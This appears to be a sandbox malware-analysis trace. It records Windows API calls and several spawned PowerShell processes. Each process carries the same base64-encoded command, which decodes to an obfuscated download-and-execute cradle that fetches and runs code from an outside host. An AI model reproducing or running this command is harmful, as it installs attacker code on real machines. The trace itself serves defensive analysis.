	[0967.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.552] CoTaskMemFree (pv=0x3768a0) 
	[0967.553] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0967.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.553] CoTaskMemFree (pv=0x3768a0) 
	[0967.553] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0967.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.553] CoTaskMemFree (pv=0x3768a0) 
	[0969.002] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0969.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.002] CoTaskMemFree (pv=0x3768a0) 
	[0969.003] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0969.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.003] CoTaskMemFree (pv=0x3768a0) 
	[0969.003] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0969.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.003] CoTaskMemFree (pv=0x3768a0) 
	[0969.011] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0969.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.012] CoTaskMemFree (pv=0x3768a0) 
	[0970.351] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0970.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.351] CoTaskMemFree (pv=0x3768a0) 
	[0970.355] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0970.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.355] CoTaskMemFree (pv=0x3768a0) 
	[0970.356] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0970.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.356] CoTaskMemFree (pv=0x3768a0) 
	[0981.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.072] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0982.072] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0982.072] CoTaskMemFree (pv=0x3768a0) 
	[0983.584] CoTaskMemAlloc (cb=0xcc) returned 0x1b800890
	[0983.584] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b800890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.584] CoTaskMemFree (pv=0x1b800890) 
	[0983.584] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd808 | out: phkResult=0x1cd808*=0x314) returned 0x0
	[0983.584] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd78c, lpData=0x0, lpcbData=0x1cd788*=0x0 | out: lpType=0x1cd78c*=0x2, lpData=0x0, lpcbData=0x1cd788*=0x6c) returned 0x0
	[0983.584] CoTaskMemAlloc (cb=0x70) returned 0x322660
	[0983.584] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd75c, lpData=0x322660, lpcbData=0x1cd758*=0x6c | out: lpType=0x1cd75c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd758*=0x6c) returned 0x0
	[0983.585] CoTaskMemFree (pv=0x322660) 
	[0983.585] CoTaskMemAlloc (cb=0xcc) returned 0x1b800890
	[0983.585] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b800890, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0983.585] CoTaskMemFree (pv=0x1b800890) 
	[0983.585] CoTaskMemAlloc (cb=0xcc) returned 0x1b800890
	[0983.585] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b800890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.585] CoTaskMemFree (pv=0x1b800890) 
	[0983.593] RegCloseKey (hKey=0x314) returned 0x0
	[0983.593] CoTaskMemAlloc (cb=0xcc) returned 0x1b800890
	[0983.593] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b800890, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.593] CoTaskMemFree (pv=0x1b800890) 
	[0983.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd808 | out: phkResult=0x1cd808*=0x314) returned 0x0
	[0983.593] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd78c, lpData=0x0, lpcbData=0x1cd788*=0x0 | out: lpType=0x1cd78c*=0x0, lpData=0x0, lpcbData=0x1cd788*=0x0) returned 0x2
	[0983.593] RegCloseKey (hKey=0x314) returned 0x0

Thread:
	id = 1086
	os_tid = 0x1614


Thread:
	id = 1109
	os_tid = 0x160c


Thread:
	id = 1359
	os_tid = 0x1ee0


Thread:
	id = 1368
	os_tid = 0x1f20


Thread:
	id = 1462
	os_tid = 0x1968


Thread:
	id = 1556
	os_tid = 0x20a0


Thread:
	id = 1620
	os_tid = 0x2204


Thread:
	id = 1621
	os_tid = 0x2208

	[0829.340] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2102
	os_tid = 0xbbc


Process:
	id = "184"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x490a4000"
	os_pid = "0x1bac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1039
	os_tid = 0x1bb0

	[0554.266] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1083
	os_tid = 0x18d8


Thread:
	id = 1106
	os_tid = 0x16fc


Process:
	id = "185"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xbfb3000"
	os_pid = "0x1bcc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1044
	os_tid = 0x1bd0

	[0580.075] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1247
	os_tid = 0x1700


Thread:
	id = 1266
	os_tid = 0x1c94


Process:
	id = "186"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3a09e000"
	os_pid = "0x1bd4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "85"
	os_parent_pid = "0x54c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1045
	os_tid = 0x1bd8

	[0550.505] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1078
	os_tid = 0x8d4


Thread:
	id = 1092
	os_tid = 0x163c


Thread:
	id = 1544
	os_tid = 0x2070


Thread:
	id = 1552
	os_tid = 0x2090


Thread:
	id = 1602
	os_tid = 0x2180


Thread:
	id = 1704
	os_tid = 0x23dc


Process:
	id = "187"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4c6c1000"
	os_pid = "0x1bf8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1050
	os_tid = 0x1bfc

	[0580.002] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1295
	os_tid = 0x1d48


Thread:
	id = 1304
	os_tid = 0x1d78


Process:
	id = "188"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3f8ce000"
	os_pid = "0x141c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1062
	os_tid = 0x145c

	[0694.065] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1395
	os_tid = 0x1fac


Thread:
	id = 1421
	os_tid = 0x1ac0


Thread:
	id = 1954
	os_tid = 0x2670


Thread:
	id = 1964
	os_tid = 0x2698


Thread:
	id = 1971
	os_tid = 0x26b4


Thread:
	id = 2072
	os_tid = 0x8b8


Process:
	id = "189"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x536ba000"
	os_pid = "0x15f0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1102
	os_tid = 0x16f4

	[0694.163] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1396
	os_tid = 0x1fb0


Thread:
	id = 1427
	os_tid = 0x1384


Thread:
	id = 2107
	os_tid = 0x2060


Thread:
	id = 2108
	os_tid = 0x2198


Thread:
	id = 2110
	os_tid = 0x230c


Process:
	id = "190"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x514b2000"
	os_pid = "0x1704"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1110
	os_tid = 0x1624

	[0700.309] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1412
	os_tid = 0x1b5c


Thread:
	id = 1443
	os_tid = 0xb9c


Process:
	id = "191"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x50926000"
	os_pid = "0x4b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1124
	os_tid = 0x1190

	[0664.301] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0825.230] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0835.789] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.789] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.789] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0835.789] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0916.848] sprintf_s (in: _DstBuf=0x18f078, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
